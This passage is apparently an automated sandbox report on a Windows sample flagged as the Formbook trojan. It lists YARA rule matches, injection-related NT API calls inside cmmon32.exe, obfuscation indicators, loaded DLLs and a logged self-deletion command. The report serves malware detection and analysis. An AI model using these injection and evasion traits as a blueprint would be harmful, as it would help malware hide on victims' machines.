                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C33D70 NtOpenThread
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C33D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C339B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_02CAA350 NtCreateFile
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_02CAA480 NtClose
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_02CAA400 NtReadFile
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_02CAA530 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_02CAA2C2 NtCreateFile
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_02CAA3FA NtReadFile
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_02CAA47C NtClose
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04ADA036 NtQueryInformationProcess, NtSuspendThread, NtSetContextThread, RtlQueueApcWow64Thread, NtResumeThread
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04AD9BAF NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, NtUnmapViewOfSection, NtClose
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04ADA042 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04AD9BB2 NtCreateSection, NtMapViewOfSection, NtMapViewOfSection
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: String function 04C7F290 appears 104 times
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: String function 04C35130 appears 58 times
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: String function 003365D7 appears 33 times
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: String function 04BEB970 appears 277 times
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: String function 04C47E54 appears 111 times
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: String function 0033554A appears 43 times
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: String function 04C6EA12 appears 86 times
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe; Code function: String function 01065130 appears 58 times
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe; Code function: String function 0101B970 appears 277 times
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe; Code function: String function 010AF290 appears 105 times
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe; Code function: String function 01077E54 appears 111 times
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe; Code function: String function 0109EA12 appears 86 times
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000000.1268307730.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameyXcfL.exe: vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1306814449.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameCAA.dll4 vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1307423026.0000000009460000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1297563213.00000000045BE000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameCAA.dll4 vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1295745302.00000000016FE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363227417.0000000000F79000.00000040.10000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameCMMON32.exe` vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameCMMON32.exe` vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameCMMON32.exe` vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363401729.000000000111D000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe; Binary or memory string: OriginalFilenameyXcfL.exe: vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: xU0wdBC6XWRZ6UY.exe PID: 1540, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Process Memory Space: xU0wdBC6XWRZ6UY.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Process Memory Space: cmmon32.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: xU0wdBC6XWRZ6UY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, KZZXqcc8tiXrQFatx7.cs | Security API names: _0020.SetAccessControl
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, KZZXqcc8tiXrQFatx7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, KZZXqcc8tiXrQFatx7.cs | Security API names: _0020.AddAccessRule
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, BMr7Oeh4xf4rlMegaY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, BMr7Oeh4xf4rlMegaY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, KZZXqcc8tiXrQFatx7.cs | Security API names: _0020.SetAccessControl
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, KZZXqcc8tiXrQFatx7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, KZZXqcc8tiXrQFatx7.cs | Security API names: _0020.AddAccessRule
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, BMr7Oeh4xf4rlMegaY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KZZXqcc8tiXrQFatx7.cs | Security API names: _0020.SetAccessControl
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KZZXqcc8tiXrQFatx7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KZZXqcc8tiXrQFatx7.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@112/1@12/6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xU0wdBC6XWRZ6UY.exe.log
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Mutant created: NULL
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_03
                Source: C:\Windows\SysWOW64\cmmon32.exe | Command line argument: @s3 14_2_00337290
                Source: xU0wdBC6XWRZ6UY.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: xU0wdBC6XWRZ6UY.exe | ReversingLabs: Detection: 73%
                Source: unknown | Process created: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Process created: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
                Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: windowscodecs.dll
                Source: C:\Windows\explorer.exe | Section loaded: wscinterop.dll
                Source: C:\Windows\explorer.exe | Section loaded: wscapi.dll
                Source: C:\Windows\explorer.exe | Section loaded: werconcpl.dll
                Source: C:\Windows\explorer.exe | Section loaded: framedynos.dll
                Source: C:\Windows\explorer.exe | Section loaded: wer.dll
                Source: C:\Windows\explorer.exe | Section loaded: hcproviders.dll
                Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
                Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
                Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
                Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: cmutil.dll
                Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: xU0wdBC6XWRZ6UY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: xU0wdBC6XWRZ6UY.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cmmon32.pdb source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363227417.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: cmmon32.pdbGCTL source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363227417.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1364936334.0000000004A16000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1363062363.0000000004862000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: xU0wdBC6XWRZ6UY.exe, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 0000000E.00000003.1364936334.0000000004A16000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1363062363.0000000004862000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: xU0wdBC6XWRZ6UY.exe, Login.cs.Net Code: InitializeComponent
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KZZXqcc8tiXrQFatx7.cs.Net Code: S7OsFP35go System.Reflection.Assembly.Load(byte[])
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, KZZXqcc8tiXrQFatx7.cs.Net Code: S7OsFP35go System.Reflection.Assembly.Load(byte[])
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, KZZXqcc8tiXrQFatx7.cs.Net Code: S7OsFP35go System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_018FCF68 pushad ; iretd 3_2_018FCF69
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_064EB01E push es; retf 3_2_064EB020
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_064E2DE0 push edx; retf 3_2_064E2DF7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_064EBB8A pushad ; ret 3_2_064EBBA1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_064EBB80 push eax; ret 3_2_064EBB81
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C99F9E push ecx; retf 3_2_07C99F9F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C99FAF push eax; retf 3_2_07C99FB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C99D0E push ebx; retf 3_2_07C99D12
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C99D00 push esp; retf 3_2_07C99D01
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C9D3FE push esp; iretd 3_2_07C9D401
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C96198 pushfd ; retf 3_2_07C9619C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07CF902A push esp; ret 3_2_07CF902D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00401208 push esi; ret 11_2_0040120E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041D4F2 push eax; ret 11_2_0041D4F8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041D4FB push eax; ret 11_2_0041D562
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041D4A5 push eax; ret 11_2_0041D4F8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041D55C push eax; ret 11_2_0041D562
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00FF225F pushad ; ret 11_2_00FF27F9
